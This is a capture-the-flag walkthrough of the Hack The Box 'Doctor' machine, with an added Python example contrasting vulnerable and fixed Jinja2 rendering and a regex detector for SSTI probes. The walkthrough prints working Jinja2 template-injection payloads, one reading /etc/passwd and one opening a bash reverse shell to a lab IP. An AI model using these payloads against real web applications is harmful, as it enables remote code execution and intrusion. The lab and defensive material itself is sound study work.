Doctor-HTB-Walkthrough


1. Portscan

2. User flag

Found a login page after adding doctors.htb to /etc/hosts. Initially I played around with SQL injection but did not gain anything. With the help of gobuster we found some more pages, including an archive page.

Then I registered myself and logged in. There is a new message page. Remember the archive page we found using gobuster: anything we post here gets displayed in the source code of the archive page. I successfully executed XSS, but XSS plays no role here. So I followed PayloadsAllTheThings and tried Server-Side Template Injection. Posting the simple test payload confirms that the Jinja2 template engine is running in the backend.


Following the same approach, I tried executing commands.

Using the highlighted payload, I successfully executed a command as the web user (the double underscores in the attribute names are part of the payload; they were eaten by the page's formatting):

{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
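The root cause of the injection above is that the archive page builds the Jinja2 template from the posted message itself, so template delimiters in user input are interpreted rather than displayed. The following is an added example, not code from the box or the original post: it shows the vulnerable pattern beside the fixed one (user input passed as a template variable instead of being concatenated into the template source) and a small detector that flags SSTI probes such as the ones used here in submitted messages. The Flask-like function names and the sample messages are constructed for illustration; Jinja2 is imported only if it is installed so the detector runs on its own.

```python
import re

try:
    import jinja2  # optional: only needed for the render functions
except ImportError:  # pragma: no cover
    jinja2 = None


def render_message_vulnerable(msg):
    """VULNERABLE: the user's message becomes the template source.

    '{{7*7}}' renders as '49', which is exactly the confirmation
    step used in the walkthrough. Returns None if Jinja2 is absent.
    """
    if jinja2 is None:
        return None
    return jinja2.Environment().from_string(msg).render()


def render_message_safe(msg):
    """FIXED: the template is a constant; the message is passed as data.

    Jinja2 never parses the message, so '{{7*7}}' is shown literally.
    autoescape=True also neutralises the XSS the post mentions.
    Returns None if Jinja2 is absent.
    """
    if jinja2 is None:
        return None
    env = jinja2.Environment(autoescape=True)
    return env.from_string("{{ msg }}").render(msg=msg)


# Indicators of Jinja2 SSTI probing: template delimiters, the dunder
# attribute walk (__class__/__init__/__globals__) and os.popen/subprocess.
_SSTI_PATTERNS = {
    "jinja_delimiters": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "dunder_chain": re.compile(r"__(class|init|globals|builtins|subclasses|mro)__"),
    "os_exec": re.compile(r"\b(popen|system|subprocess)\b"),
}


def flag_ssti_probe(msg):
    """Return the names of SSTI indicators present in a posted message."""
    return [name for name, rx in _SSTI_PATTERNS.items() if rx.search(msg)]


def triage_messages(messages):
    """Map each constructed message to its SSTI indicators (empty list = clean)."""
    return {m: flag_ssti_probe(m) for m in messages}


if __name__ == "__main__":
    # Constructed sample messages, modelled on the post's progression.
    samples = [
        "hello doctors, new patient here",
        "{{7*7}}",
        "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
    ]
    for msg, hits in triage_messages(samples).items():
        print(f"{hits or ['clean']} <- {msg!r}")
    print("vulnerable:", render_message_vulnerable("{{7*7}}"))
    print("safe:      ", render_message_safe("{{7*7}}"))
```

The detector is meant for reviewing stored messages or request logs after the fact; the real fix is the second render function, and for templates that must legitimately come from users Jinja2's `SandboxedEnvironment` is the documented option.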

Alright, now it's time to get a shell (again, the double underscores belong to the payload):

{{config.__class__.__init__.__globals__['os'].popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.138/5555 0>&1"').read()}}


After posting the payload, just refresh the archive page and we get our first shell as web.


Not over yet: there is another user named Shaun who has the user flag. Using linpeas I found a backup file in /var/log/apache2/backup where I found the password of Shaun.


3. Root

Taking root is simple. Remember that in the port scan we found splunkd running on port 8809. That's the way in. With some simple googling, I found an exploit for it on git.


